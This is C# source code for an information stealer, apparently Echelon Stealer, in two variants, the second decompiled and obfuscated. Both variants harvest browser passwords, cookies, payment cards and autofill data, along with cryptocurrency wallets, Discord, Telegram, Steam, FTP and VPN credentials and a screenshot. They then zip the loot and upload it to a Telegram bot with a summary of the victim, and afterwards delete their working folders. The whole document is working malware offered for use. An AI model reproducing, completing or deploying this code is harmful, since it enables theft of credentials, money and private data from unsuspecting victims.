public static void GetStealer()
{
// Создаем временные директории для сбора лога
Directory.CreateDirectory(Help.Echelon_Dir);
Directory.CreateDirectory(Help.Browsers);
Directory.CreateDirectory(Help.Passwords);
Directory.CreateDirectory(Help.Autofills);
Directory.CreateDirectory(Help.Downloads);
Directory.CreateDirectory(Help.Cookies);
Directory.CreateDirectory(Help.History);
Directory.CreateDirectory(Help.Cards);
//Скрываем временную папку
File.SetAttributes(Help.dir, FileAttributes.Directory | FileAttributes.Hidden | FileAttributes.System);
// Запускаем граббер файлов в отдельном потоке
GetFiles.Inizialize(Help.Echelon_Dir);
Thread.Sleep(new Random(Environment.TickCount).Next(10000, 20000));
// Chromium
new Thread(() =>
{
Chromium.GetCookies(Help.Cookies);
}).Start();
new Thread(() =>
{
Chromium.GetPasswords(Help.Passwords);
}).Start();
new Thread(() =>
{
Chromium.GetAutofills(Help.Autofills);
}).Start();
new Thread(() =>
{
Chromium.GetDownloads(Help.Downloads);
}).Start();
new Thread(() =>
{
Chromium.GetHistory(Help.History);
}).Start();
new Thread(() =>
{
Chromium.GetCards(Help.Cards);
}).Start();
new Thread(() =>
{
// Mozilla
Steal.Cookies();
}).Start();
new Thread(() =>
{
Steal.Passwords();
}).Start();
new Thread(() =>
{
ProtonVPN.Start(Help.Echelon_Dir);
}).Start();
new Thread(() =>
{
Outlook.GrabOutlook(Help.Echelon_Dir);
}).Start();
new Thread(() =>
{
OpenVPN.Start(Help.Echelon_Dir);
}).Start();
new Thread(() =>
{
NordVPN.Start(Help.Echelon_Dir);
}).Start();
new Thread(() =>
{
Startjabbers.Start(Help.Echelon_Dir);
}).Start();
new Thread(() =>
{
TGrabber.Start(Help.Echelon_Dir);
}).Start();
new Thread(() =>
{
DGrabber.Start(Help.Echelon_Dir);
}).Start();
Screenshot.Start(Help.Echelon_Dir);
BuffBoard.Inizialize(Help.Echelon_Dir);
Systemsinfo.ProgProc(Help.Echelon_Dir);
FileZilla.Start(Help.Echelon_Dir);
TotalCommander.Start(Help.Echelon_Dir);
StartWallets.Start(Help.Echelon_Dir);
DomainDetect.Start(Help.Browsers);
// Пакуем в апхив с паролем
string zipName = Help.dir + "\\" + Help.DateLog + "_" + Help.HWID + Help.CountryCOde() + ".zip";
using (ZipFile zip = new ZipFile(Encoding.GetEncoding("cp866"))) // Устанавливаем кодировку
{
zip.CompressionLevel = CompressionLevel.BestCompression; // Задаем максимальную степень сжатия
zip.Comment = "Echelon Stealer by @madcod Log. <Build v3.0>" +
"\n|----------------------------------------|" +
"\nPC:" + Environment.MachineName + "/" + Environment.UserName +
"\nIP: " + Help.IP + Help.Country() +
"\nHWID: " + Help.DateLog + "_" + Help.HWID
;
zip.Password = Program.passwordzip; // Задаём пароль
zip.AddDirectory(@"" + Help.Echelon_Dir); // Кладем в архив содержимое папки с логом
zip.Save(@"" + zipName); // Сохраняем архив
}
string LOG = @"" + zipName;
byte[] file = File.ReadAllBytes(LOG);
string url = string.Concat(new string[]
{
Help.ApiUrl,
Program.Token,
"/sendDocument?chat_id=",
Program.ID,
"&caption=👤 " + Environment.MachineName + "/" + Environment.UserName +
"\n🏴 IP: " + Help.IP + Help.Country() +
"\n🌐 Browsers Data" +
"\n ∟🔑" + (Chromium.Passwords + Edge.count + Steal.count) +
"\n ∟🍪" + (Chromium.Cookies + Steal.count_cookies) +
"\n ∟🕑" + Chromium.History +
"\n ∟📝" + Chromium.Autofills +
"\n ∟💳" + Chromium.CC +
"\n💶 Wallets: " + (StartWallets.count > 0 ? "✅" : "❌") +
(Electrum.count > 0 ? " Electrum" : "") +
(Armory.count > 0 ? " Armory" : "") +
(AtomicWallet.count > 0 ? " Atomic" : "") +
(BitcoinCore.count > 0 ? " BitcoinCore" : "") +
(Bytecoin.count > 0 ? " Bytecoin" : "") +
(DashCore.count > 0 ? " DashCore" : "") +
(Ethereum.count > 0 ? " Ethereum" : "") +
(Exodus.count > 0 ? " Exodus" : "") +
(LitecoinCore.count > 0 ? " LitecoinCore" : "") +
(Monero.count > 0 ? " Monero" : "") +
(Zcash.count > 0 ? " Zcash" : "") +
(Jaxx.count > 0 ? " Jaxx" : "") +
//
"\n📂 FileGrabber: " + GetFiles.count + //Работает
"\n💬 Discord: " + (DGrabber.count > 0 ? "✅" : "❌") + //Работает
"\n✈️ Telegram: " + (TGrabber.count > 0 ? "✅" : "❌") + //Работает
"\n💡 Jabber: " + (Startjabbers.count + Pidgin.PidginCount > 0 ? "✅" : "❌") +
(Pidgin.PidginCount > 0 ? " Pidgin (" + Pidgin.PidginAkks + ")" : "") +
(Startjabbers.count > 0 ? " Psi" : "") + //Работает
"\n📡 FTP" +
"\n ∟ FileZilla: " + (FileZilla.count > 0 ? "✅" + " (" + FileZilla.count + ")" : "❌") + //Работает
"\n ∟ TotalCmd: " + (TotalCommander.count > 0 ? "✅" : "❌") + //Работает
"\n🔌 VPN" +
"\n ∟ NordVPN: " + (NordVPN.count > 0 ? "✅" : "❌") + //Работает
"\n ∟ OpenVPN: " + (OpenVPN.count > 0 ? "✅" : "❌") + //Работает
"\n ∟ ProtonVPN: " + (ProtonVPN.count > 0 ? "✅" : "❌") + //Работает
"\n🆔 HWID: " + Help.HWID + //Работает
"\n⚙️ " + Systemsinfo.GetOSInformation() +
"\n🔎 " + File.ReadAllText(Help.Browsers + "\\DomainDetect.txt")
});
try
{
SenderAPI.POST(file, LOG, "application/x-ms-dos-executable", url);
Directory.Delete(Help.dir + "\\", true);
//Записываем HWID в файл, означает что лог с данного ПК уже отправлялся и больше слать его не надо.
File.AppendAllText(Help.LocalData + "\\" + Help.HWID, Help.HWID);
}
catch
{
}
}
public static void Start()
{
try
{
Directory.CreateDirectory(Global.Echelon_Dir);
Directory.CreateDirectory(Global.Browsers);
}
catch
{
}
new Thread((ThreadStart) delegate
{
al.a(Global.Echelon_Dir);
}).Start();
new Thread((ThreadStart) delegate
{
ad.a(Global.Echelon_Dir);
}).Start();
new Thread((ThreadStart) delegate
{
TGrabber.Start(Global.Echelon_Dir);
}).Start();
new Thread((ThreadStart) delegate
{
an.a(Global.Echelon_Dir);
}).Start();
new Thread((ThreadStart) delegate
{
ao.a(Global.Echelon_Dir);
}).Start();
new Thread((ThreadStart) delegate
{
am.a(Global.Echelon_Dir);
}).Start();
new Thread((ThreadStart) delegate
{
ae.a(Global.Echelon_Dir);
}).Start();
new Thread((ThreadStart) delegate
{
af.a(Global.Echelon_Dir);
}).Start();
new Thread((ThreadStart) delegate
{
ab.b(Global.Echelon_Dir);
}).Start();
new Thread((ThreadStart) delegate
{
ai.a(Global.Echelon_Dir);
}).Start();
new Thread((ThreadStart) delegate
{
aj.a(Global.Echelon_Dir);
}).Start();
new Thread((ThreadStart) delegate
{
q.b(Global.Browsers);
r.a(Global.Browsers);
o.a(Global.Browsers);
p.a(Global.Browsers);
s.a(Global.Browsers);
}).Start();
new Thread((ThreadStart) delegate
{
aa.d(Global.Browsers);
aa.c(Global.Browsers);
}).Start();
new Thread((ThreadStart) delegate
{
ak.a(Global.Echelon_Dir);
}).Start();
ba.a(Global.Echelon_Dir);
GetFiles.Inizialize(Global.Echelon_Dir);
Thread.Sleep(new Random(Environment.TickCount).Next(30000, 60000));
string ac = Global.dir + "\\" + Global.DateLog + "_" + Global.GetHwid() + Global.CountryCOde() + ".zip";
i.a(Global.Echelon_Dir, ac);
string text = Global.dir + "\\" + Global.DateLog + "_" + Global.GetHwid() + Global.CountryCOde() + ".zip";
byte[] file = File.ReadAllBytes(text);
string url = string.Concat(Global.ApiUrl, g.d, "/sendDocument?chat_id=", g.e, "&caption=\ud83d\udc64 " + Environment.MachineName + "/" + Environment.UserName + "\n\ud83c\udff4 IP: " + Global.IP + Global.Country() + "\n\ud83c\udf10 Browsers Data" + "\n ∟\ud83d\udd11" + (q.a + y.a + aa.a) + "\n ∟\ud83c\udf6a" + (r.a + aa.b) + "\n ∟\ud83d\udd51" + s.a + "\n ∟\ud83d\udcdd" + o.a + "\n ∟\ud83d\udcb3" + p.a + "\n\ud83d\udcb6 Wallets: " + ba.a + "\n\ud83d\udcc2 FileGrabber: " + GetFiles.count + "\n\ud83d\udd79 Steam: " + ((al.a > 0) ? "✅" : "❌") + "\n\ud83d\udcac Discord: " + ((ad.a > 0) ? "✅" : "❌") + "\n✈\ufe0f Telegram: " + ((TGrabber.count > 0) ? "✅" : "❌") + "\n\ud83d\udca1 Jabber: " + ((ai.a > 0) ? "✅" : "❌") + "\n\ud83d\udce1 FTP" + "\n ∟ FileZilla: " + ((ae.a > 0) ? "✅" : "❌") + "\n ∟ TotalCmd: " + ((af.a > 0) ? "✅" : "❌") + "\n\ud83d\udd0c VPN" + "\n ∟ NordVPN: " + ((am.a > 0) ? "✅" : "❌") + "\n ∟ OpenVPN: " + ((an.a > 0) ? "✅" : "❌") + "\n ∟ ProtonVPN: " + ((ao.a > 0) ? "✅" : "❌") + "\n\ud83c\udd94 Global: " + Global.GetHwid() + "\n⚙\ufe0f " + ak.d());
try
{
Thread.Sleep(new Random(Environment.TickCount).Next(1000, 2000));
SenderAPI.POST(file, text, "application/x-ms-dos-executable", url);
File.AppendAllText(g.b + "\\logs", j.a());
Directory.Delete(Global.dir + "\\", recursive: true);
}
catch
{
Thread.Sleep(new Random(Environment.TickCount).Next(1000, 2000));
if (!Directory.Exists(g.b))
{
DirectoryInfo directoryInfo = Directory.CreateDirectory(g.b);
Directory.CreateDirectory(g.b);
directoryInfo.Refresh();
File.AppendAllText(g.b + "\\logs", j.a());
Directory.Delete(Global.dir + "\\", recursive: true);
}
}
}